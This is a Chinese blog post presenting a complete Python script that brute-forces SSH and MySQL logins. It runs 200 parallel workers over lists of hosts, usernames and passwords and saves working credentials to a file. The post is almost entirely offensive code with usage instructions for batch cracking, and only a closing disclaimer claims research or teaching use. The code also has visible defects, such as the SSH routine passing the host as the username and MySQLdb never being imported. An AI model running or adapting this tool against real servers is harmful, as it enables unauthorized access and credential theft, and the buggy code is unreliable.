当前位置:隐士博客 > 编程技术 > python > Python爆破SSH与MYSQL

Python爆破SSH与MYSQL

2019-07-02 0 评 1,740 阅 1 赞

根据提供的端口判断是MYSQL还是SSH。

比上一个的好用一些,这个可以用来批量爆破

还有就是SSH的准确率好像有问题,

跟在添加一个FTP的,留给下次了。

代码凑合着看,如果有更高速方便的方法望告知。

Usage:python xxx –h <目标主机文件> –u <用户字典> –p <密码字典> -P <端口号>

成功保存在good.txt,运行的时候先创建好

  1. #!coding=utf-8
  2. import re
  3. import socket
  4. import optparse
  5. import threading
  6. from multiprocessing import Pool
  7. import multiprocessing
  8.  
  9. try:
  10.     import paramiko
  11. except ImportError:
  12.         print "[!!!]need to install paramiko modul"
  13.         print "[!!!]Usage:pip install paramiko"
  14.         exit()
  15.  
  16. result_user =None
  17. result_pass =None
  18. threads =[]
  19.  
  20. #----------------------------------------------------------------------
  21. def main():
  22.     """
  23.     主函数,处理输入的参数
  24.     自动根据所提供的端口号判断mysql与ssh
  25.     """
  26.     parse = optparse.OptionParser('python %prog --h <host dictionary> --u <users dictionary> --p <password dictionary> -P <port>')    
  27.     parse.add_option('--h', dest="host_dic", type="string", help='目标主机')
  28.     parse.add_option('--u', dest='user_dic', type='string', help='用户字典')
  29.     parse.add_option('--p', dest='pwd_dic', type='string', help='密码字典')
  30.     parse.add_option('-P', dest='port', type='int', help='端口')
  31.     (options, args) = parse.parse_args()
  32.     host_dic = options.host_dic
  33.     user_dic = options.user_dic
  34.     pwd_dic = options.pwd_dic
  35.     port = options.port
  36.     if host_dic is not None:
  37.         mysql_brute(host_dic, user_dic, pwd_dic, port)
  38.     else:
  39.         print "[!!!]Unknon IP"
  40.         exit()
  41.  
  42. def ip_open(ip,ports):
  43.     """
  44.     判断主机是否存活,暂无使用
  45.     """
  46.     sock =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  47.     try:
  48.         sock.connect((ip,ports))
  49.         sock.settimeout(1)
  50.         sock.close()
  51.         return True
  52.     except Exception:
  53.         sock.close()
  54.         return False
  55.  
  56. #----------------------------------------------------------------------
  57. def mysql_brute(host_dic,user_dic,pwd_dic,port):
  58.     """
  59.      MySQL暴力破解
  60.     :param host_dic: 主机
  61.     :param user_dic: 用户字典
  62.     :param pwd_dic: 密码字典
  63.     :param port: 端口
  64.     :return: None
  65.     """
  66.  
  67.     hostlist = None
  68.     userlist = None
  69.     pwdlist = None
  70.     try:
  71.         hostlist = [k.strip('\n') for k in open(host_dic, 'r').readlines()]
  72.         userlist = [i.strip('\n') for i in open(user_dic, 'r').readlines()]
  73.         pwdlist = [j.strip('\n') for j in open(pwd_dic, 'r').readlines()]
  74.         print "[*] Number of hosts:" + str(len(hostlist))
  75.         print "[*] Number of users:" + str(len(userlist))
  76.         print "[*] Number of passwords:" + str(len(pwdlist))
  77.     except Exception:
  78.         print "[!] The path of the dictionary file is incorrect"
  79.         exit()
  80.     global threads
  81.     if port==22:
  82.         paramiko.util.log_to_file("filename.log")
  83.     p = Pool(200)
  84.     for host in hostlist:
  85.         for user in userlist:
  86.             for pwd in pwdlist:
  87.                 if port ==3306:
  88.                     p.apply_async(mysql_login,args=(host, user, pwd, port))
  89.                 elif port ==22:
  90.                     p.apply_async(ssh_login,args=(host, user, pwd, port))
  91.     p.close()
  92.     p.join() 
  93.  
  94. #----------------------------------------------------------------------
  95. def ssh_login(host, username, password, port):
  96.     """
  97.     ssh登录
  98.     :param host:主机
  99.     :param username:用户名
  100.     :param password: 密码
  101.     :param port: 端口
  102.     :return: None
  103.     """
  104.     try:
  105.         ssh = paramiko.SSHClient()
  106.         #以传统密钥验证用户密码
  107.         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  108.         ssh.connect(hostname=host,username=host,password=password,port=port)
  109.         ssh.close()
  110.         print "\033[1;32;41m[+] Success! User:" + username + " Password:" + password + "\033[0m"
  111.         output = open("good.txt", 'a')
  112.         output.write(host+"=>"+username+"----"+password+"\n")
  113.     except:
  114.         print "[-] host:"+host+" Password:" + password
  115.         pass
  116.  
  117. #----------------------------------------------------------------------    
  118. def mysql_login(host, username, password, port):
  119.     """
  120.     MySQL连接
  121.     :param host:主机
  122.     :param username:用户名
  123.     :param password: 密码
  124.     :param port: 端口
  125.     :return: None
  126.     """
  127.     try:
  128.         db = MySQLdb.connect(host=host, user=username, passwd=password, port=port,connect_timeout=1)
  129.         print "\033[1;32;41m[+] Success! User:" + username + " Password:" + password + "\033[0m"
  130.         global result_user, result_pass
  131.         result_user = username
  132.         result_pass = password
  133.         output = open("good.txt", 'a')
  134.         output.write(host+"=>"+username+"----"+password+"\n")
  135.         db.close()
  136.         exit()
  137.     except Exception:
  138.         print "[-] host:"+host+" Password:" + password
  139.         pass
  140.  
  141.  
  142. #----------------------------------------------------------------------
  143. if __name__ == '__main__':
  144.     main()
  145.     print "\033[1;32;41m[*] Scan OK! \033[0m"
  146.     exit()

 

免责声明:本博客的提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

相关文章

发表评论

邮箱地址不会被公开。 必填项已用*标注